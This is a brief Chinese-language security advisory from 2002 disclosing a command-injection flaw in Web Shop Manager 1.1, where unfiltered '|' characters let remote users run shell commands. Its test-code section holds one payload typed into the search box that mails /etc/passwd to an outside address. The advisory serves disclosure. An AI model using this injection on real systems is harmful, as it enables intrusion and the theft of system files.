Webscriptworld Web Shop Manager存在远程任意命令执行漏洞发布时间:2002-08-21 更新时间:2002-08-21 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5474 受影响系统 Webscriptworld Web Shop Manager 1.1详细描述 Web Shop Manager是免费开放源代码WEB商店脚本。 Web Shop Manager没有充分过滤用户提供的输入,远程攻击者可以提交任意命令给脚本执行,这些脚本将以WEB进程权限执行。 问题是由于对"|"缺少过滤。 测试代码 在Web shop manager搜索框你输入: |mail user@host.com < /etc/passwd 解决方案 无 相关信息 Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>. 参考:http://online.securityfocus.com/archive/1/287483 相关主页:http://www.webscriptworld.com/scripts/wsm.phtml |
